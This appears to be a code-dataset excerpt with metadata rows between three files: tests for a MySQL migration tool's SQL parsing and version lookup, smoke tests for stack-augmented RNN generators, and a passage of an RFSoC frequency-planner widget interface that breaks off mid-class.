        expected_versions.append([2, "20090211120001", "label", "20090211120001_name", "sql_up", "sql_down"])
        self.cursor_mock.fetchall.return_value = tuple(expected_versions)
        mysql = MySQL(self.config_mock, self.db_driver_mock)
        schema_migrations = mysql.get_all_schema_migrations()
        self.assertEqual(len(expected_versions), len(schema_migrations))
        for index, migration in enumerate(schema_migrations):
            self.assertEqual(migration.id, expected_versions[index][0])
            self.assertEqual(migration.version, expected_versions[index][1])
            self.assertEqual(migration.label, expected_versions[index][2])
            self.assertEqual(migration.file_name, expected_versions[index][3])
            # NULL sql_up/sql_down columns must come back as empty strings.
            self.assertEqual(migration.sql_up, expected_versions[index][4] and expected_versions[index][4] or "")
            self.assertEqual(migration.sql_down, expected_versions[index][5] and expected_versions[index][5] or "")
        expected_query_calls = [
            call('create database if not exists `migration_test`;')
        ]
        self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
        self.db_mock.select_db.assert_called_with('migration_test')
        self.assertEqual(2, self.db_mock.commit.call_count)
        self.assertEqual(5, self.db_mock.close.call_count)
        expected_execute_calls = [
            call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
            call('select count(*) from __db_version__;'),
            call('insert into __db_version__ (version) values ("0")'),
            call('select id, version, label, name, sql_up, sql_down from __db_version__ order by id;')
        ]
        self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
        self.assertEqual(4, self.cursor_mock.close.call_count)

    def test_it_should_parse_sql_statements(self):
        """Empty statements produced by stray ';' separators are dropped."""
        statements = MySQL._parse_sql_statements('; ; create table eggs; drop table spam; ; ;')
        self.assertEqual(2, len(statements))
        self.assertEqual('create table eggs', statements[0])
        self.assertEqual('drop table spam', statements[1])

    def test_it_should_parse_sql_statements_with_html_inside(self):
        """Semicolons inside quoted HTML must not split the statement."""
        sql = u"""
create table eggs;
INSERT INTO widget_parameter_domain (widget_parameter_id, label, value)
VALUES ((SELECT MAX(widget_parameter_id)
FROM widget_parameter), "Carros", '<div class="box-zap-geral">
<div class="box-zap box-zap-autos">
<a class="logo" target="_blank" title="ZAP" href="http://www.zap.com.br/Parceiros/g1/RedirG1.aspx?CodParceriaLink=42&URL=http://www.zap.com.br">');
drop table spam;
"""
        statements = MySQL._parse_sql_statements(sql)
        expected_sql_with_html = """INSERT INTO widget_parameter_domain (widget_parameter_id, label, value)
VALUES ((SELECT MAX(widget_parameter_id)
FROM widget_parameter), "Carros", '<div class="box-zap-geral">
<div class="box-zap box-zap-autos">
<a class="logo" target="_blank" title="ZAP" href="http://www.zap.com.br/Parceiros/g1/RedirG1.aspx?CodParceriaLink=42&URL=http://www.zap.com.br">')"""
        self.assertEqual(3, len(statements))
        self.assertEqual('create table eggs', statements[0])
        self.assertEqual(expected_sql_with_html, statements[1])
        self.assertEqual('drop table spam', statements[2])

    def test_it_should_get_none_for_a_non_existent_version_in_database(self):
        """An unknown version number yields None, not an error."""
        mysql = MySQL(self.config_mock, self.db_driver_mock)
        ret = mysql.get_version_id_from_version_number('xxx')
        self.assertEqual(None, ret)
        expected_query_calls = [
            call('create database if not exists `migration_test`;')
        ]
        self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
        self.db_mock.select_db.assert_called_with('migration_test')
        self.assertEqual(2, self.db_mock.commit.call_count)
        self.assertEqual(5, self.db_mock.close.call_count)
        expected_execute_calls = [
            call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
            call('select count(*) from __db_version__;'),
            call('insert into __db_version__ (version) values ("0")'),
            call("select id from __db_version__ where version = 'xxx' order by id desc;")
        ]
        self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
        self.assertEqual(4, self.cursor_mock.close.call_count)

    def test_it_should_get_most_recent_version_for_a_existent_label_in_database(self):
        """For a known label, the most recent version row wins."""
        # NOTE(review): "vesion" is a deliberate fixture value, matched below.
        self.fetchone_returns["select version from __db_version__ where label = 'xxx' order by id desc"] = ["vesion", "version2", "version3"]
        mysql = MySQL(self.config_mock, self.db_driver_mock)
        ret = mysql.get_version_number_from_label('xxx')
        self.assertEqual("vesion", ret)
        expected_query_calls = [
            call('create database if not exists `migration_test`;')
        ]
        self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
        self.db_mock.select_db.assert_called_with('migration_test')
        self.assertEqual(2, self.db_mock.commit.call_count)
        self.assertEqual(5, self.db_mock.close.call_count)
        expected_execute_calls = [
            call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
            call('select count(*) from __db_version__;'),
            call('insert into __db_version__ (version) values ("0")'),
            call("select version from __db_version__ where label = 'xxx' order by id desc")
        ]
        self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
        self.assertEqual(4, self.cursor_mock.close.call_count)

    def test_it_should_get_none_for_a_non_existent_label_in_database(self):
        """An unknown label yields None, not an error."""
        mysql = MySQL(self.config_mock, self.db_driver_mock)
        ret = mysql.get_version_number_from_label('xxx')
        self.assertEqual(None, ret)
        expected_query_calls = [
            call('create database if not exists `migration_test`;')
        ]
        self.assertEqual(expected_query_calls, self.db_mock.query.mock_calls)
        self.db_mock.select_db.assert_called_with('migration_test')
        self.assertEqual(2, self.db_mock.commit.call_count)
        self.assertEqual(5, self.db_mock.close.call_count)
        expected_execute_calls = [
            call('create table if not exists __db_version__ ( id int(11) NOT NULL AUTO_INCREMENT, version varchar(20) NOT NULL default "0", label varchar(255), name varchar(255), sql_up LONGTEXT, sql_down LONGTEXT, PRIMARY KEY (id))'),
            call('select count(*) from __db_version__;'),
            call('insert into __db_version__ (version) values ("0")'),
            call("select version from __db_version__ where label = 'xxx' order by id desc")
        ]
        self.assertEqual(expected_execute_calls, self.cursor_mock.execute.mock_calls)
        self.assertEqual(4, self.cursor_mock.close.call_count)

    def side_effect(self, returns, default_value):
        """Look up the scripted result for the last executed SQL.

        Raises the scripted value if it is an Exception, otherwise returns it
        (or default_value when the SQL has no script entry).
        """
        result = returns.get(self.last_execute_command, default_value)
        if isinstance(result, Exception):
            raise result
        return result

    def execute_side_effect(self, *args):
        """Record the SQL being executed, then apply the execute script."""
        self.last_execute_command = args[0]
        return self.side_effect(self.execute_returns, 0)

    def fetchone_side_effect(self, *args):
        """Apply the fetchone script keyed on the last executed SQL."""
        return self.side_effect(self.fetchone_returns, None)

    def close_side_effect(self, *args):
        """Apply the close script keyed on the last executed SQL."""
        return self.side_effect(self.close_returns, None)
# Allow running this module directly (e.g. `python tests/mysql_test.py`).
if __name__ == "__main__":
    unittest.main()
| 57.901499
| 298
| 0.697374
| 3,520
| 27,040
| 5.003693
| 0.06875
| 0.084313
| 0.035769
| 0.030659
| 0.838699
| 0.810481
| 0.794981
| 0.77914
| 0.774825
| 0.762505
| 0
| 0.030888
| 0.196598
| 27,040
| 466
| 299
| 58.025751
| 0.779875
| 0
| 0
| 0.564433
| 0
| 0.054124
| 0.365459
| 0.052885
| 0
| 0
| 0
| 0
| 0.306701
| 0
| null | null | 0.002577
| 0.018041
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82f2b33e639f75e9f4bd82d79d798e99f2256e2a
| 7,484
|
py
|
Python
|
tests/stackRNN_tests.py
|
NovaXiong/ReLeaSE
|
aaed3af62a43fb06c1ce7c60edda74f2836d0952
|
[
"MIT"
] | 257
|
2018-06-20T15:58:01.000Z
|
2022-03-20T01:30:48.000Z
|
tests/stackRNN_tests.py
|
gkxiao/ReLeaSE
|
3d0f5533b7c5982a322bcf9cd1b03fb57afcd828
|
[
"MIT"
] | 33
|
2018-06-03T05:16:34.000Z
|
2022-03-04T08:49:28.000Z
|
tests/stackRNN_tests.py
|
gkxiao/ReLeaSE
|
3d0f5533b7c5982a322bcf9cd1b03fb57afcd828
|
[
"MIT"
] | 120
|
2018-06-27T03:41:48.000Z
|
2022-03-29T13:23:55.000Z
|
"""
Unit tests for StackAugmentedRNN class
"""
import sys
sys.path.append('./')
import pytest
import torch
from stackRNN import StackAugmentedRNN
from data import GeneratorData
gen_data_path = './data/logP_labels.csv'
gen_data = GeneratorData(training_data_path=gen_data_path, delimiter=',',
cols_to_read=[1], keep_header=False)
hidden_size = 50
stack_width = 50
stack_depth = 10
lr = 0.001
optimizer_instance = torch.optim.Adadelta
use_cuda = True
def test_bidirectional_stack_gru():
    """Smoke-test fit/evaluate for a bidirectional GRU with stack memory."""
    settings = dict(
        input_size=gen_data.n_characters,
        hidden_size=hidden_size,
        output_size=gen_data.n_characters,
        layer_type='GRU',
        n_layers=1,
        is_bidirectional=True,
        has_stack=True,
        stack_width=stack_width,
        stack_depth=stack_depth,
        use_cuda=use_cuda,
        optimizer_instance=optimizer_instance,
        lr=lr,
    )
    generator = StackAugmentedRNN(**settings).cuda()
    generator.fit(gen_data, 100)
    generator.evaluate(gen_data)
def test_unidirectional_stack_gru():
    """Smoke-test fit/evaluate for a unidirectional GRU with stack memory."""
    settings = dict(
        input_size=gen_data.n_characters,
        hidden_size=hidden_size,
        output_size=gen_data.n_characters,
        layer_type='GRU',
        n_layers=1,
        is_bidirectional=False,
        has_stack=True,
        stack_width=stack_width,
        stack_depth=stack_depth,
        use_cuda=use_cuda,
        optimizer_instance=optimizer_instance,
        lr=lr,
    )
    generator = StackAugmentedRNN(**settings).cuda()
    generator.fit(gen_data, 100)
    generator.evaluate(gen_data)
def test_unidirectional_gru_no_stack():
    """Smoke-test fit/evaluate for a unidirectional GRU without a stack."""
    settings = dict(
        input_size=gen_data.n_characters,
        hidden_size=hidden_size,
        output_size=gen_data.n_characters,
        layer_type='GRU',
        n_layers=1,
        is_bidirectional=False,
        has_stack=False,
        # stack dimensions are passed but unused when has_stack is False
        stack_width=stack_width,
        stack_depth=stack_depth,
        use_cuda=use_cuda,
        optimizer_instance=optimizer_instance,
        lr=lr,
    )
    generator = StackAugmentedRNN(**settings).cuda()
    generator.fit(gen_data, 100)
    generator.evaluate(gen_data)
def test_bidirectional_gru_no_stack():
    """Smoke-test fit/evaluate for a bidirectional GRU without a stack."""
    settings = dict(
        input_size=gen_data.n_characters,
        hidden_size=hidden_size,
        output_size=gen_data.n_characters,
        layer_type='GRU',
        n_layers=1,
        is_bidirectional=True,
        has_stack=False,
        # stack dimensions are passed but unused when has_stack is False
        stack_width=stack_width,
        stack_depth=stack_depth,
        use_cuda=use_cuda,
        optimizer_instance=optimizer_instance,
        lr=lr,
    )
    generator = StackAugmentedRNN(**settings).cuda()
    generator.fit(gen_data, 100)
    generator.evaluate(gen_data)
def test_bidirectional_stack_lstm():
    """Smoke-test fit/evaluate for a bidirectional LSTM with stack memory."""
    settings = dict(
        input_size=gen_data.n_characters,
        hidden_size=hidden_size,
        output_size=gen_data.n_characters,
        layer_type='LSTM',
        n_layers=1,
        is_bidirectional=True,
        has_stack=True,
        stack_width=stack_width,
        stack_depth=stack_depth,
        use_cuda=use_cuda,
        optimizer_instance=optimizer_instance,
        lr=lr,
    )
    generator = StackAugmentedRNN(**settings).cuda()
    generator.fit(gen_data, 100)
    generator.evaluate(gen_data)
def test_unidirectional_stack_lstm():
    """Train briefly and evaluate a unidirectional stack-augmented LSTM generator."""
    layer_type = 'LSTM'
    my_generator = StackAugmentedRNN(input_size=gen_data.n_characters,
                                     hidden_size=hidden_size,
                                     output_size=gen_data.n_characters,
                                     layer_type=layer_type,
                                     n_layers=1, is_bidirectional=False,
                                     has_stack=True,
                                     stack_width=stack_width,
                                     stack_depth=stack_depth,
                                     use_cuda=use_cuda,
                                     optimizer_instance=optimizer_instance,
                                     lr=lr)
    # Guard the GPU transfer: unconditional .cuda() fails on hosts
    # without CUDA, contradicting the use_cuda flag passed above.
    if use_cuda:
        my_generator = my_generator.cuda()
    losses = my_generator.fit(gen_data, 100)
    my_generator.evaluate(gen_data)
def test_unidirectional_lstm_no_stack():
    """Train briefly and evaluate a unidirectional LSTM generator without a stack."""
    layer_type = 'LSTM'
    my_generator = StackAugmentedRNN(input_size=gen_data.n_characters,
                                     hidden_size=hidden_size,
                                     output_size=gen_data.n_characters,
                                     layer_type=layer_type,
                                     n_layers=1, is_bidirectional=False,
                                     has_stack=False,
                                     stack_width=stack_width,
                                     stack_depth=stack_depth,
                                     use_cuda=use_cuda,
                                     optimizer_instance=optimizer_instance,
                                     lr=lr)
    # Guard the GPU transfer: unconditional .cuda() fails on hosts
    # without CUDA, contradicting the use_cuda flag passed above.
    if use_cuda:
        my_generator = my_generator.cuda()
    losses = my_generator.fit(gen_data, 100)
    my_generator.evaluate(gen_data)
def test_bidirectional_lstm_no_stack():
    """Train briefly and evaluate a bidirectional LSTM generator without a stack."""
    layer_type = 'LSTM'
    my_generator = StackAugmentedRNN(input_size=gen_data.n_characters,
                                     hidden_size=hidden_size,
                                     output_size=gen_data.n_characters,
                                     layer_type=layer_type,
                                     n_layers=1, is_bidirectional=True,
                                     has_stack=False,
                                     stack_width=stack_width,
                                     stack_depth=stack_depth,
                                     use_cuda=use_cuda,
                                     optimizer_instance=optimizer_instance,
                                     lr=lr)
    # Guard the GPU transfer: unconditional .cuda() fails on hosts
    # without CUDA, contradicting the use_cuda flag passed above.
    if use_cuda:
        my_generator = my_generator.cuda()
    losses = my_generator.fit(gen_data, 100)
    my_generator.evaluate(gen_data)
| 43.260116
| 75
| 0.485703
| 670
| 7,484
| 5.013433
| 0.1
| 0.130991
| 0.052397
| 0.05716
| 0.893123
| 0.893123
| 0.893123
| 0.893123
| 0.893123
| 0.893123
| 0
| 0.010623
| 0.459113
| 7,484
| 172
| 76
| 43.511628
| 0.81917
| 0.005078
| 0
| 0.839161
| 0
| 0
| 0.007126
| 0.002958
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055944
| false
| 0
| 0.034965
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82f321da93c17b582d91b5ab6eb89a1a0612871c
| 42,564
|
py
|
Python
|
rfsoc_freqplan/interface.py
|
dnorthcote/rfsoc_frequency_planner
|
11edaf726545d93991506b10a14fd47ac2acf445
|
[
"BSD-3-Clause"
] | 9
|
2021-02-26T17:20:35.000Z
|
2022-02-14T12:03:20.000Z
|
rfsoc_freqplan/interface.py
|
dnorthcote/rfsoc_frequency_planner
|
11edaf726545d93991506b10a14fd47ac2acf445
|
[
"BSD-3-Clause"
] | 1
|
2021-03-12T10:26:20.000Z
|
2021-03-12T10:26:20.000Z
|
rfsoc_freqplan/interface.py
|
dnorthcote/rfsoc_frequency_planner
|
11edaf726545d93991506b10a14fd47ac2acf445
|
[
"BSD-3-Clause"
] | 4
|
2021-02-27T20:07:43.000Z
|
2021-07-29T23:20:47.000Z
|
__author__ = "Joshua Goldsmith"
__organisation__ = "The Univeristy of Strathclyde"
__support__ = "https://github.com/strath-sdr/rfsoc_frequency_planner"
from ipywidgets import widgets
import plotly.graph_objs as go
from .calculation import FrequencyPlannerADC, FrequencyPlannerDAC, FrequencyPlannerDDC, FrequencyPlannerDUC
plot_width = 1000
plot_height = 550
class ADCWidgets:
    """Interactive frequency-plan view for the RF-ADC (receiver).

    Builds ipywidgets controls (Fs, Fc, bandwidth, PLL reference clock,
    interleaving factor) next to a Plotly ``FigureWidget`` driven by a
    :class:`FrequencyPlannerADC`, and redraws the spur traces whenever a
    control changes.  Band/spur entries from the planner are dicts with
    ``'xmin'/'xmax'/'ymin'/'ymax'/'color'/'label'`` keys (as used below).
    """

    def __init__(self):
        """Create the planner model, the plot, and all linked controls."""
        self.data = FrequencyPlannerADC()
        self._plot = self.__setup_plot()
        # Shared widget layouts so every row lines up in the accordion.
        self._label_layout = widgets.Layout(width='80px')
        self._slider_layout = widgets.Layout(width='120px')
        self._entry_layout = widgets.Layout(width='90px')
        self._units_layout = widgets.Layout(width='37px')
        # NOTE(review): not referenced elsewhere in this class.
        self._button_layout = widgets.Layout(width='87px', fontsize=12)
        # Each control row: label | slider | numeric entry | units.
        # Slider and entry are kept in sync client-side via jslink, and
        # the slider's observer pushes the value into the planner model.
        self.fs_label = widgets.Label("Fs", layout=self._label_layout)
        self.fs_slider = widgets.FloatSlider(value=self.data.fs_rf, min=1000.0, max=4096.0, step=0.01, readout=False, layout=self._slider_layout)
        self.fs_entry = widgets.BoundedFloatText(value=self.fs_slider.value, min=self.fs_slider.min, max=self.fs_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.fs_units = widgets.Label("MSPS", layout=self._units_layout)
        widgets.jslink((self.fs_slider, 'value'), (self.fs_entry, 'value'))
        self.fs_slider.observe(self.__update_fs, 'value')
        self.fc_label = widgets.Label("Fc", layout=self._label_layout)
        self.fc_slider = widgets.FloatSlider(value=self.data.fc, min=0.0, max=4096.0, step=0.01, readout=False, layout=self._slider_layout)
        self.fc_entry = widgets.BoundedFloatText(value=self.fc_slider.value, min=self.fc_slider.min, max=self.fc_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.fc_units = widgets.Label("MHz", layout=self._units_layout)
        widgets.jslink((self.fc_slider, 'value'), (self.fc_entry, 'value'))
        self.fc_slider.observe(self.__update_fc, 'value')
        self.bw_label = widgets.Label("Bandwidth", layout=self._label_layout)
        # Bandwidth is capped at Fs/2; the cap is refreshed in __update_fs.
        self.bw_slider = widgets.FloatSlider(value=self.data.fs_bw, min=0.0, max=self.fs_slider.value/2, step=0.01, readout=False, layout=self._slider_layout)
        self.bw_entry = widgets.BoundedFloatText(value=self.bw_slider.value, min=self.bw_slider.min, max=self.bw_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.bw_units = widgets.Label("MHz", layout=self._units_layout)
        widgets.jslink((self.bw_slider, 'value'), (self.bw_entry, 'value'))
        self.bw_slider.observe(self.__update_bw, 'value')
        self.pll_label = widgets.Label("PLL Ref Clk", layout=self._label_layout)
        self.pll_slider = widgets.FloatSlider(value=self.data.pll_ref, min=102.40, max=615.0, step=0.01, readout=False, layout=self._slider_layout)
        self.pll_entry = widgets.BoundedFloatText(value=self.pll_slider.value, min=self.pll_slider.min, max=self.pll_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.pll_units = widgets.Label("MHz", layout=self._units_layout)
        widgets.jslink((self.pll_slider, 'value'), (self.pll_entry, 'value'))
        self.pll_slider.observe(self.__update_pll, 'value')
        # Interleaving factor is a discrete choice (4x or 8x).
        self.il_label = widgets.Label("IL Factor", layout=self._label_layout)
        self.il_blank = widgets.Label("", layout=self._slider_layout)
        self.il_entry = widgets.Dropdown(options=["4","8"],value=str(self.data.il_factor), layout=self._entry_layout)
        self.il_units = widgets.Label("X", layout=self._units_layout)
        self.il_entry.observe(self.__update_il, 'value')
        # Read-only label mirroring the planner's calibration-mode string.
        self.calibration = widgets.Label(self.data.calibration_mode, layout=widgets.Layout(flex='auto'))
        self.param_controls = widgets.Accordion([widgets.VBox([
            widgets.HBox([self.fs_label, self.fs_slider, self.fs_entry, self.fs_units]),
            widgets.HBox([self.fc_label, self.fc_slider, self.fc_entry, self.fc_units]),
            widgets.HBox([self.bw_label, self.bw_slider, self.bw_entry, self.bw_units]),
            widgets.HBox([self.pll_label, self.pll_slider, self.pll_entry, self.pll_units]),
            widgets.HBox([self.il_label, self.il_blank, self.il_entry, self.il_units])])
        ])
        self.param_controls.set_title(0, 'RF-DC Parameters')
        self.params = widgets.VBox([
            self.param_controls,
            widgets.HBox([self.calibration])
        ])
        # Top-level layout: controls on the left, plot on the right.
        self.layout = widgets.HBox([self.params, self._plot])

    def __update_fs(self, change):
        """Push a new sample rate into the model and re-cap bandwidth at Fs/2."""
        self.data.fs_rf = change['new']
        self.bw_slider.max = change['new']/2
        self.bw_entry.max = change['new']/2
        self.__update_plot()

    def __update_fc(self, change):
        """Push a new centre frequency into the model and redraw."""
        self.data.fc = change['new']
        self.__update_plot()

    def __update_bw(self, change):
        """Push a new bandwidth into the model and redraw."""
        self.data.fs_bw = change['new']
        self.__update_plot()

    def __update_pll(self, change):
        """Push a new PLL reference clock into the model and redraw."""
        self.data.pll_ref = change['new']
        self.__update_plot()

    def __update_il(self, change):
        """Change the interleaving factor and toggle IL/fs-8 spur traces.

        Trace indices are offset by 4 because plot data 0-3 are the Rx band
        (3 traces) and the Nyquist line — see __setup_plot/__update_plot.
        """
        self.data.il_factor = int(change['new'])
        # remove fs/8 spurs when il factor != 8
        with self._plot.batch_update():
            if change['new'] == "4":
                # spurs_list indices 7, 8 (il_rx4/il_rx5) and 15-18
                # (fs8_m/p_hd2/hd3) only apply to 8x interleaving.
                self._plot.data[7+4].visible = False
                self._plot.data[8+4].visible = False
                self._plot.data[15+4].visible = False
                self._plot.data[16+4].visible = False
                self._plot.data[17+4].visible = False
                self._plot.data[18+4].visible = False
            else:
                self._plot.data[7+4].visible = True
                self._plot.data[8+4].visible = True
                self._plot.data[15+4].visible = True
                self._plot.data[16+4].visible = True
                self._plot.data[17+4].visible = True
                self._plot.data[18+4].visible = True
        # only update when il factor changes from 4 to 8
        self.__update_plot()

    def __update_plot(self):
        """Re-position every trace from the model; colour spurs that hit the Rx band red."""
        # Order must match the spurs built in __setup_plot (offset +4 below).
        spurs_list = [self.data.hd2, self.data.hd3, self.data.hd4, self.data.hd5,
                      self.data.il_rx1, self.data.il_rx2, self.data.il_rx3, self.data.il_rx4, self.data.il_rx5,
                      self.data.fs2_m_hd2, self.data.fs4_m_hd2, self.data.fs4_p_hd2, self.data.fs2_m_hd3, self.data.fs4_m_hd3, self.data.fs4_p_hd3, self.data.fs8_m_hd2, self.data.fs8_p_hd2, self.data.fs8_m_hd3, self.data.fs8_p_hd3,
                      self.data.pll_mix_up, self.data.pll_mix_down]
        # batch_update coalesces all trace changes into one redraw.
        with self._plot.batch_update():
            self._plot.data[0].x = [self.data.rx_band['xmin'], self.data.rx_band['xmax']]
            self._plot.data[1].x = [self.data.rx_band['xmin'], self.data.rx_band['xmin']]
            self._plot.data[2].x = [self.data.rx_band['xmax'], self.data.rx_band['xmax']]
            self._plot.data[3].x = [self.data.nyquist['xmax'], self.data.nyquist['xmax']]
            for i in range(len(spurs_list)):
                self._plot.data[i+4].x = [spurs_list[i]['xmin'], spurs_list[i]['xmax']]
                if self.__intersection(spurs_list[i], self.data.rx_band):
                    # Spur overlaps the receive band: highlight as a conflict.
                    self._plot.data[i+4].line['color'] = 'red'
                else:
                    self._plot.data[i+4].line['color'] = spurs_list[i]['color']
        self.calibration.value = self.data.calibration_mode

    def __setup_plot(self):
        """Build the FigureWidget: Rx band (top + 2 edges), Nyquist line, then spurs."""
        rx_band = go.Scatter(x=[self.data.rx_band['xmin'], self.data.rx_band['xmax']], y=[self.data.rx_band['ymax'], self.data.rx_band['ymax']], line=dict(color=self.data.rx_band['color']), name=self.data.rx_band['label'], legendgroup="rx", hovertext=self.data.rx_band['label'], hoverinfo='text+x')
        rx_band_l = go.Scatter(x=[self.data.rx_band['xmin'], self.data.rx_band['xmin']], y=[self.data.rx_band['ymin'], self.data.rx_band['ymax']], line=dict(color=self.data.rx_band['color']), name=self.data.rx_band['label'], showlegend=False, legendgroup="rx", hovertext=self.data.rx_band['label'], hoverinfo='text+x')
        rx_band_r = go.Scatter(x=[self.data.rx_band['xmax'], self.data.rx_band['xmax']], y=[self.data.rx_band['ymin'], self.data.rx_band['ymax']], line=dict(color=self.data.rx_band['color']), name=self.data.rx_band['label'], showlegend=False, legendgroup="rx", hovertext=self.data.rx_band['label'], hoverinfo='text+x')
        nyq = go.Scatter(x=[self.data.nyquist['xmin'], self.data.nyquist['xmin']], y=[self.data.nyquist['ymin'], self.data.nyquist['ymax']], line=dict(color=self.data.nyquist['color']), name=self.data.nyquist['label'], hovertext=self.data.nyquist['label'], hoverinfo='text+x')
        # Same ordering as __update_plot's spurs_list — keep them in sync.
        spurs_list = [self.data.hd2, self.data.hd3, self.data.hd4, self.data.hd5,
                      self.data.il_rx1, self.data.il_rx2, self.data.il_rx3, self.data.il_rx4, self.data.il_rx5,
                      self.data.fs2_m_hd2, self.data.fs4_m_hd2, self.data.fs4_p_hd2, self.data.fs2_m_hd3, self.data.fs4_m_hd3, self.data.fs4_p_hd3, self.data.fs8_m_hd2, self.data.fs8_p_hd2, self.data.fs8_m_hd3, self.data.fs8_p_hd3,
                      self.data.pll_mix_up, self.data.pll_mix_down]
        spurs = [go.Scatter(x=[d['xmin'], d['xmax']], y=[d['ymax'], d['ymax']], name=d['label'], hovertext=d['label'], hoverinfo='text+x', line=dict(color=d['color'])) for d in spurs_list]
        plot_items = [rx_band, rx_band_l, rx_band_r, nyq] + spurs
        plot = go.FigureWidget(plot_items)
        plot.update_layout(
            title={'text':"Digital Receiver Frequency Plan", 'x':0.46, 'y':0.9, 'xanchor':'center', 'yanchor':'top'},
            xaxis_title={'text':"Frequency (MHz)"},
            yaxis_title={'text':"Harmonic No."},
            width=plot_width,
            height=plot_height,
        )
        return plot

    def __intersection(self, a, b):
        """Return True when intervals *a* and *b* overlap on the x axis.

        Strict inequalities mean touching edges count as an intersection.
        """
        if ((a['xmin'] < b['xmax']) and (a['xmax'] < b['xmin'])) or ((a['xmin'] > b['xmax']) and (a['xmax'] > b['xmin'])):
            return False
        else:
            return True
class DACWidgets:
    """Interactive frequency-plan view for the RF-DAC (transmitter).

    Mirrors ADCWidgets but is driven by a :class:`FrequencyPlannerDAC`:
    controls for Fs, Fc, bandwidth and the PLL reference clock sit next
    to a Plotly ``FigureWidget`` showing the Tx band, its image, two
    Nyquist lines and the harmonic/PLL-mixing spurs.
    """

    def __init__(self):
        """Create the planner model, the plot, and all linked controls."""
        self.data = FrequencyPlannerDAC()
        self._plot = self.__setup_plot()
        # Shared widget layouts so every row lines up in the accordion.
        self._label_layout = widgets.Layout(width='80px')
        self._slider_layout = widgets.Layout(width='120px')
        self._entry_layout = widgets.Layout(width='90px')
        self._units_layout = widgets.Layout(width='37px')
        # NOTE(review): not referenced elsewhere in this class.
        self._button_layout = widgets.Layout(width='87px', fontsize=12)
        # Each control row: label | slider | numeric entry | units.
        # Slider and entry stay in sync via jslink; the slider observer
        # pushes the value into the planner model.
        self.fs_label = widgets.Label("Fs", layout=self._label_layout)
        self.fs_slider = widgets.FloatSlider(value=self.data.fs_rf, min=1000.0, max=6554.0, step=0.01, readout=False, layout=self._slider_layout)
        self.fs_entry = widgets.BoundedFloatText(value=self.fs_slider.value, min=self.fs_slider.min, max=self.fs_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.fs_units = widgets.Label("MSPS", layout=self._units_layout)
        widgets.jslink((self.fs_slider, 'value'), (self.fs_entry, 'value'))
        self.fs_slider.observe(self.__update_fs, 'value')
        self.fc_label = widgets.Label("Fc", layout=self._label_layout)
        self.fc_slider = widgets.FloatSlider(value=self.data.fc, min=0.0, max=6554.0, step=0.01, readout=False, layout=self._slider_layout)
        self.fc_entry = widgets.BoundedFloatText(value=self.fc_slider.value, min=self.fc_slider.min, max=self.fc_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.fc_units = widgets.Label("MHz", layout=self._units_layout)
        widgets.jslink((self.fc_slider, 'value'), (self.fc_entry, 'value'))
        self.fc_slider.observe(self.__update_fc, 'value')
        self.bw_label = widgets.Label("Bandwidth", layout=self._label_layout)
        # Bandwidth is capped at Fs/2; the cap is refreshed in __update_fs.
        self.bw_slider = widgets.FloatSlider(value=self.data.fs_bw, min=0.0, max=self.fs_slider.value/2, step=0.01, readout=False, layout=self._slider_layout)
        self.bw_entry = widgets.BoundedFloatText(value=self.bw_slider.value, min=self.bw_slider.min, max=self.bw_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.bw_units = widgets.Label("MHz", layout=self._units_layout)
        widgets.jslink((self.bw_slider, 'value'), (self.bw_entry, 'value'))
        self.bw_slider.observe(self.__update_bw, 'value')
        self.pll_label = widgets.Label("PLL Ref Clk", layout=self._label_layout)
        self.pll_slider = widgets.FloatSlider(value=self.data.pll_ref, min=102.4, max=615.0, step=0.01, readout=False, layout=self._slider_layout)
        self.pll_entry = widgets.BoundedFloatText(value=self.pll_slider.value, min=self.pll_slider.min, max=self.pll_slider.max, step=0.01, continuous_update=False, layout=self._entry_layout)
        self.pll_units = widgets.Label("MHz", layout=self._units_layout)
        widgets.jslink((self.pll_slider, 'value'), (self.pll_entry, 'value'))
        self.pll_slider.observe(self.__update_pll, 'value')
        # Read-only label mirroring the planner's mixer-mode string.
        self.mix_mode = widgets.Label(self.data.mix_mode, layout=widgets.Layout(flex='auto'))
        self.param_controls = widgets.Accordion([widgets.VBox([
            widgets.HBox([self.fs_label, self.fs_slider, self.fs_entry, self.fs_units]),
            widgets.HBox([self.fc_label, self.fc_slider, self.fc_entry, self.fc_units]),
            widgets.HBox([self.bw_label, self.bw_slider, self.bw_entry, self.bw_units]),
            widgets.HBox([self.pll_label, self.pll_slider, self.pll_entry, self.pll_units])])
        ])
